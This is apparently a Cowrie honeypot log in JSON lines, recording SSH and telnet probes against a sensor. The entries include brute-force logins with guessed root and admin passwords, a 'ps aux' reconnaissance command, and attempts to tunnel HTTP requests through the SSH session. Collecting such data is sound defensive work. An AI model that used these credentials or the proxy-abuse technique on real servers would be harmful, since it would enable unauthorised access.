{"eventid":"cowrie.session.connect","src_ip":"194.165.16.167","src_port":26887,"dst_ip":"1.2.3.4","dst_port":23,"session":"40343ccd25e8","protocol":"telnet","message":"New connection: 194.165.16.167:26887 (1.2.3.4:23) [session: 40343ccd25e8]","sensor":"my-vps","timestamp":"2025-08-31T00:07:53.178898Z"}
{"eventid":"cowrie.session.closed","duration":0.015122652053833008,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:07:53.193966Z","src_ip":"194.165.16.167","session":"40343ccd25e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52514,"dst_ip":"1.2.3.4","dst_port":22,"session":"a96ab577c103","protocol":"ssh","message":"New connection: 212.227.235.229:52514 (1.2.3.4:22) [session: a96ab577c103]","sensor":"my-vps","timestamp":"2025-08-31T00:07:54.976773Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:07:55.077876Z","src_ip":"212.227.235.229","session":"a96ab577c103"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51324,"dst_ip":"1.2.3.4","dst_port":22,"session":"39e471ce59da","protocol":"ssh","message":"New connection: 212.227.125.160:51324 (1.2.3.4:22) [session: 39e471ce59da]","sensor":"my-vps","timestamp":"2025-08-31T00:08:35.746579Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:08:35.814365Z","src_ip":"212.227.125.160","session":"39e471ce59da"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.118","src_port":61548,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fe22771fb95","protocol":"ssh","message":"New connection: 192.155.90.118:61548 (1.2.3.4:22) [session: 9fe22771fb95]","sensor":"my-vps","timestamp":"2025-08-31T00:09:50.618032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:09:50.809746Z","src_ip":"192.155.90.118","session":"9fe22771fb95"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T00:09:50.810481Z","src_ip":"192.155.90.118","session":"9fe22771fb95"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:09:51.514613Z","src_ip":"192.155.90.118","session":"9fe22771fb95"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.118","src_port":61564,"dst_ip":"1.2.3.4","dst_port":22,"session":"da7dbcb45fae","protocol":"ssh","message":"New connection: 192.155.90.118:61564 (1.2.3.4:22) [session: da7dbcb45fae]","sensor":"my-vps","timestamp":"2025-08-31T00:09:51.639820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:09:51.849666Z","src_ip":"192.155.90.118","session":"da7dbcb45fae"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T00:09:51.850340Z","src_ip":"192.155.90.118","session":"da7dbcb45fae"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:09:52.484113Z","src_ip":"192.155.90.118","session":"da7dbcb45fae"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.118","src_port":61574,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5f0dd5435d1","protocol":"ssh","message":"New connection: 192.155.90.118:61574 (1.2.3.4:22) [session: f5f0dd5435d1]","sensor":"my-vps","timestamp":"2025-08-31T00:09:52.642464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:09:52.880226Z","src_ip":"192.155.90.118","session":"f5f0dd5435d1"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T00:09:52.880959Z","src_ip":"192.155.90.118","session":"f5f0dd5435d1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:09:53.489677Z","src_ip":"192.155.90.118","session":"f5f0dd5435d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43386,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd458a3d0f9b","protocol":"ssh","message":"New connection: 212.227.125.160:43386 (1.2.3.4:22) [session: dd458a3d0f9b]","sensor":"my-vps","timestamp":"2025-08-31T00:09:54.242915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:09:55.458133Z","src_ip":"212.227.125.160","session":"dd458a3d0f9b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:09:55.872246Z","src_ip":"212.227.125.160","session":"dd458a3d0f9b"}
{"eventid":"cowrie.login.success","username":"root","password":"@idea92liza","message":"login attempt [root/@idea92liza] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:09:59.730726Z","src_ip":"212.227.125.160","session":"dd458a3d0f9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:10:02.808998Z","src_ip":"212.227.125.160","session":"dd458a3d0f9b"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T00:10:02.809689Z","src_ip":"212.227.125.160","session":"dd458a3d0f9b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:10:03.804252Z","src_ip":"212.227.125.160","session":"dd458a3d0f9b"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:10:03.805716Z","src_ip":"212.227.125.160","session":"dd458a3d0f9b"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":54622,"dst_ip":"1.2.3.4","dst_port":22,"session":"54ce65b8e5c2","protocol":"ssh","message":"New connection: 201.148.180.50:54622 (1.2.3.4:22) [session: 54ce65b8e5c2]","sensor":"my-vps","timestamp":"2025-08-31T00:10:12.415755Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:10:14.674391Z","src_ip":"201.148.180.50","session":"54ce65b8e5c2"}
{"eventid":"cowrie.session.connect","src_ip":"140.143.165.16","src_port":54474,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c3635965249","protocol":"telnet","message":"New connection: 140.143.165.16:54474 (1.2.3.4:23) [session: 7c3635965249]","sensor":"my-vps","timestamp":"2025-08-31T00:11:17.582478Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":7324,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b9a31ab0476","protocol":"ssh","message":"New connection: 212.227.125.160:7324 (1.2.3.4:22) [session: 8b9a31ab0476]","sensor":"my-vps","timestamp":"2025-08-31T00:11:39.936946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:11:40.361123Z","src_ip":"212.227.125.160","session":"8b9a31ab0476"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T00:11:40.362819Z","src_ip":"212.227.125.160","session":"8b9a31ab0476"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:11:41.553450Z","src_ip":"212.227.125.160","session":"8b9a31ab0476"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":7340,"dst_ip":"1.2.3.4","dst_port":22,"session":"5053c258823b","protocol":"ssh","message":"New connection: 212.227.125.160:7340 (1.2.3.4:22) [session: 5053c258823b]","sensor":"my-vps","timestamp":"2025-08-31T00:11:41.730859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:11:42.137775Z","src_ip":"212.227.125.160","session":"5053c258823b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T00:11:42.138653Z","src_ip":"212.227.125.160","session":"5053c258823b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:11:43.403260Z","src_ip":"212.227.125.160","session":"5053c258823b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":7346,"dst_ip":"1.2.3.4","dst_port":22,"session":"60ae0182b691","protocol":"ssh","message":"New connection: 212.227.125.160:7346 (1.2.3.4:22) [session: 60ae0182b691]","sensor":"my-vps","timestamp":"2025-08-31T00:11:43.608849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:11:43.982156Z","src_ip":"212.227.125.160","session":"60ae0182b691"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T00:11:43.983877Z","src_ip":"212.227.125.160","session":"60ae0182b691"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:11:45.125053Z","src_ip":"212.227.125.160","session":"60ae0182b691"}
{"eventid":"cowrie.session.closed","duration":30.597049474716187,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:11:48.179458Z","src_ip":"140.143.165.16","session":"7c3635965249"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":15893,"dst_ip":"1.2.3.4","dst_port":22,"session":"60904b9161c0","protocol":"ssh","message":"New connection: 77.83.207.83:15893 (1.2.3.4:22) [session: 60904b9161c0]","sensor":"my-vps","timestamp":"2025-08-31T00:12:37.662139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:12:37.663165Z","src_ip":"77.83.207.83","session":"60904b9161c0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T00:12:37.713037Z","src_ip":"77.83.207.83","session":"60904b9161c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:12:37.961369Z","src_ip":"77.83.207.83","session":"60904b9161c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":28037,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:28037","sensor":"my-vps","timestamp":"2025-08-31T00:12:38.012238Z","session":"60904b9161c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T00:12:38.062092Z","src_ip":"77.83.207.83","session":"60904b9161c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14987,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14987","sensor":"my-vps","timestamp":"2025-08-31T00:12:38.204071Z","session":"60904b9161c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T00:12:38.253944Z","src_ip":"77.83.207.83","session":"60904b9161c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":7885,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7885","sensor":"my-vps","timestamp":"2025-08-31T00:12:38.396159Z","session":"60904b9161c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T00:12:38.445903Z","src_ip":"77.83.207.83","session":"60904b9161c0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:12:38.496428Z","src_ip":"77.83.207.83","session":"60904b9161c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38052,"dst_ip":"1.2.3.4","dst_port":22,"session":"00ed9c41d74d","protocol":"ssh","message":"New connection: 212.227.235.229:38052 (1.2.3.4:22) [session: 00ed9c41d74d]","sensor":"my-vps","timestamp":"2025-08-31T00:13:11.105384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:13:11.993220Z","src_ip":"212.227.235.229","session":"00ed9c41d74d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:13:11.993947Z","src_ip":"212.227.235.229","session":"00ed9c41d74d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:13:15.170246Z","src_ip":"212.227.235.229","session":"00ed9c41d74d"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:13:17.132475Z","src_ip":"212.227.235.229","session":"00ed9c41d74d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33750,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2a71bacb52b","protocol":"ssh","message":"New connection: 212.227.125.160:33750 (1.2.3.4:22) [session: c2a71bacb52b]","sensor":"my-vps","timestamp":"2025-08-31T00:13:32.668995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:13:33.198742Z","src_ip":"212.227.125.160","session":"c2a71bacb52b"}
